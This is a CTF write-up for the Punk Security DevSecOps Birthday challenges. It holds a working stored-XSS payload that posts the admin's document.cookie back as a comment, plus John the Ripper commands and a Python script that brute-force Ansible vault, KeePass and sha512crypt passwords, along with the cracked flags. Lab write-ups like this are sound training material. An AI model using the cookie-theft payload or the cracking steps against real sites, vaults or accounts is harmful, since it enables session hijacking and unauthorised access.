Punk Security - DevSecOps Birthday CTF

Table of Contents

Web

XSS - Easy

Challenge Description

We've built a new blog app!

Can you get the flag from the admin user? He's logged on right now

Solution

I don't have access to the instance anymore since the CTF has been paused, but i will try to explain the steps.

After looking around we see a comment box that supports markdown, which we can exploit. We need to get the admins cookie to get the admins session. I made the following script:

<script>
fetch('http://blog.com:5000/new-comment', {
    method: 'POST',
    headers:{
      'Cookie': document.cookie,
      'Content-Type': 'application/x-www-form-urlencoded'
    },    
    body: new URLSearchParams({
        'name': 'cookie grab',
        'comment': document.cookie
    })
})
</script>

You need to make a comment that has this script in it, the script will automatically load whenever someone loads the page with the comments. The script will make a post request simulating that the person has made a comment and then make the comment text have their cookie, there will be a lot of cookies, so you might have to try some different ones, for me the second comment cookie worked, and when pressing the admin button on the top left side of the page, you are greeted with the flag.

Password Cracking

Password Cracking - 1

Challenge Description

The flag is the password for this vault.

supersecrets.yml

Solution

John the ripper has a tool for making john compatible hashes from ansible vault files, but it isn't a standard command, you will need to run the python file directly. Use the command below depending on where your john source files are placed:

python /usr/share/john/ansible2john.py supersecrets.yml > ansiblehash.txt

If you somehow can't find the john files, you can download the ansible2john.py file from here

This will make a john compatible password hash from the ansible vault file and output it into ansiblehash.txt.

Now we can run john to bruteforce the password:

john --wordlist=new_rockyou.txt ansiblehash.txt

The new_rockyou.txt wordlist is from the Password Cracking 2 writeup, check it out.

When john is done, you should have gotten the password zebracrossing.

Password Cracking - 2

Challenge Description

The flag is the password for this vault.

keepass.kdbx

Solution

For this challenge we will be using John the ripper to crack the password hash. First we need to obtain the password hash. We need to use keepass2john to make a john compatible hash. We use the command below.

keepass2john keepass.kdbx > keepasshash.txt

This command takes the password hash and then outputs it into the keepasshash.txt file.

Now we can bruteforce the password with john using the command below:

john --wordlist=/usr/share/wordlists/rockyou.txt KeepassHash.txt

Replace the wordlist path if yours is placed somewhere else.

Now this is going to take a lot of time. But finally when we crack one password challenge, we can crack others faster.

image1

When john has found the password, we can see that it's zebracakes, and that's the flag.

Now keep in mind that the password included "zebra", this is also the logo of Punk Security. This might mean that we can make a new password list with only entries in rouckyou.txt that includes "zebra". To make this list, i made a quick python script:

with open("rockyou.txt", "r", errors="ignore") as f:
    passwords = [pw.strip() for pw in f.readlines()]

new_passwords = []

for password in passwords:
    if "zebra" in password.lower():
        new_passwords.append(password)

with open("new_rockyou.txt", "w") as f:
    f.write("\n".join(new_passwords))

This will make a new_rockyou.txt file with only entries that includes "zebra" from the original rockyou.txt list. You can also download it here if you want to.

Password Cracking - 4

Challenge Description

$6$XM4TZ5vb6W/0SjIl$PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0

The flag is the password corresponding with this hash.

Solution

For this challenge i first needed to find out what type of hash that was, so i used hashes.com/en/tools/hash_identifier to identify the hash type. It came back as sha512crypt $6$ so I googled that. I found this page that explained it quite well. We can split the hash into 3 parts, the hash method, salt and hash. I made a python script to crack the password for this one using pythons passlib.hash library. I have split the hash into the salt and hash, because the hash type is not really needed when we know that we need to use sha512. Also, i didn't know the amount of rounds the hash went through, so just to be sure, i made it go from 1.000 to 10.000 rounds.

Read Password Cracking 2 to see what new_rockyou.txt is.

import passlib.hash

salt = "XM4TZ5vb6W/0SjIl"
hashed_flag = "PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0"
full_hash = "$6$XM4TZ5vb6W/0SjIl$PsddDrA8bOKbVXApHrz9NKaF9BH92Fs1aKn6MFHelf1he8z7rbR9Af12FqynqlU2lHILU/FgNaDVUFCK2yc4B0"

with open("new_rockyou.txt", "r", errors="ignore") as f:
    passwords = [pw.strip() for pw in f.readlines()]

for n in range(1,10):
    n = n * 1000
    print("Rounds:", n)
    for password in passwords:
        h = passlib.hash.sha512_crypt.hash(password, salt=salt,rounds=n)
        if h == full_hash:
            print(password)
            exit(0)

When running the script, it tries to go through our wordlist and hashes with the salt. If the new hash matches the full hash, then it prints the flag and exits the script. From the run we see that the amount of rounds is 5.000 and the password is zebrasrule.

Password Cracking - 5

Challenge Description

fd217a229b674ae4bcb82a0bb4751e11

The flag is the password corresponding with this hash.

Solution

This one was pretty easy. I usually run hashes through hashes.com/en/tools/hash_identifier to identify hashes. And right away it sees that it's an MD5 hash and shows the password. 16drunkzebras.

image1g